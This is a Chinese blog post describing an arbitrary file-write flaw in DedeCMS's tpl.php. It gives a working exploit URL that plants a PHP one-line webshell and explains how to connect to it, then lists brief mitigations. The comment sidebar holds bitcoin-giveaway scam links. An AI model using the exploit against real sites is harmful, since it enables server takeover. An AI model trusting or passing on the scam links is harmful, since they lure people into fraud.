小灰博客--小灰IT技术博客 | sky00.com

织梦CMS最新任意写入漏洞

今天服务器提示有webshell文件,上去看下确实是被写入了一句话木马。顺藤摸瓜发现织梦/dede/tpl.php竟然存在任意写入漏洞,也不知道这个漏洞有多久了,是否被公开,既然发现了就记录下把,具体是利用tpl.php的文件管理功能,对标签的一个写入漏洞。exp是这样的

1
www.xxx.com/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?php%20$s=create_function(%27%27,$_REQUEST[x]);$s();?%3E&filename=leo.lib.php

访问确定后会在/include/taglib/目录下面生成一个叫leo.lib.php的文件。这个文件里面是一句话木马,就是url里写的PHP代码,如图

(图丢了,自己领悟)

具体想写什么在url里带入就行,接下来上菜刀,链接即可。需要注意一点,生成的文件名必须是 xxx.lib.php

具体防护方法修改后台路径肯定是必不可少的 ,当然现在曝下织梦路径也不是什么难事,首先可以关闭/include/taglib/下的写入权限,其次其实很多网站根本用不着文件管理器,建议直接把tpl.php文件删除或者重命名。


如果该文章帮到了您,不妨帮忙分享支持下博主!
同时也欢迎各位技术爱好者加入IT技术群(点击即可):70035098 互相交流学习!

分享该文章到:

7 条评论

  1. 今日头条说道:

    文章不错支持一下吧

  2. 头条说道:

    文章不错非常喜欢

  3. 骨骼尚美说道:

    不错的文章,学习了



发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

分类

最新评论

  • + 1.137921 BTC.NEXT - https://yandex.com/poll/DCTzwgNQnzCykVhgbhD581?hs=32fb9425b62f8025c93b1a741cda529c&:didcyq
  • + 1.779120 BTC.GET - https://yandex.com/poll/76RuKke5vYn6W1hp2wxzvb?hs=46cca2220f62b645c465c3659609f169&:4jnm98
  • Ticket: + 1,450330 BTC. Get > https://yandex.com/poll/76RuKke5vYn6W1hp2wxzvb?hs=d2e9f25426f06f324d26af9866fa1537&:girqat
  • + 1.962123 BTC.NEXT - https://yandex.com/poll/5JjqQt7R61CTYdYVd17t6p?hs=55473f62ca80b75d789e64fa58e49760&:7818gc
  • + 1.474092 BTC.GET - https://graph.org/Ticket--58146-05-02?hs=9e710a17c6f1893b8975843ad65a53ec&:3dvnw2
  • + 1.478940 BTC.NEXT - https://graph.org/Ticket--58146-05-02?hs=111a7c8b116abe352c74949c481b3c7f&:c7t0pv
  • + 1.414945 BTC.NEXT - https://graph.org/Ticket--58146-05-02?hs=189b84788c5e6405c53f7dd1193b9874&:umgly6
  • + 1.689074 BTC.GET - https://graph.org/Ticket--58146-05-02?hs=c5d93ba1cba130eac0442e0b01e08d9d&:iy7mdu
  • Notification: TRANSACTION 1.129243 BTC. Continue >> https://graph.org/Ticket--58146-05-02?hs=82b659c095cace05cbef312726b6e1d9&:fzvug0
  • + 1.463044 BTC.GET - https://graph.org/Ticket--58146-05-02?hs=f4f7ece997f382758bf7917d8d281a38&:swrwfu
  • + 1.949656 BTC.NEXT - https://graph.org/Ticket--58146-05-02?hs=d9564a149cf7ebbc725fcfce1bd3d512&:0si3ke
  • + 1.6825 BTC.GET - https://graph.org/Ticket--58146-05-02?hs=e8e513973712a3c92cfc5061bded6465&:jq3tz4
  • + 1.674227 BTC.GET - https://graph.org/Official-donates-from-Binance-04-01?hs=9e710a17c6f1893b8975843ad65a53ec&:5q176p
  • Ticket- Process 1,851260 BTC. Receive >> https://graph.org/Official-donates-from-Binance-04-01?hs=81d107938621831ce06bfc98e59470ae&:xtjbtk
  • + 1.419261 BTC.NEXT - https://graph.org/Official-donates-from-Binance-04-01?hs=558cdf18520cfb0ab9368563ad878fe3&:t1ixi5
  • + 1.200600 BTC.NEXT - https://graph.org/Official-donates-from-Binance-04-01?hs=20bcd57ec809274e19061c909e168662&:2ixvv9
  • + 1.681136 BTC.GET - https://graph.org/Official-donates-from-Binance-04-01?hs=48af46897a78ce23e02d3d6d91453c82&:xg3n0k
  • Message: Operation 1,579770 bitcoin. Withdraw => https://graph.org/Official-donates-from-Binance-04-01?hs=8b618b6f3e2558ea545b01f25c66ea45&:f5w4y0
  • Reminder- TRANSFER 1.299580 BTC. Get => https://graph.org/Official-donates-from-Binance-04-01?hs=a0af85c70258e2d35864223f8bf1561e&:bapbbx
  • + 1.195608 BTC.NEXT - https://graph.org/Message--17856-03-25?hs=9e710a17c6f1893b8975843ad65a53ec&:102182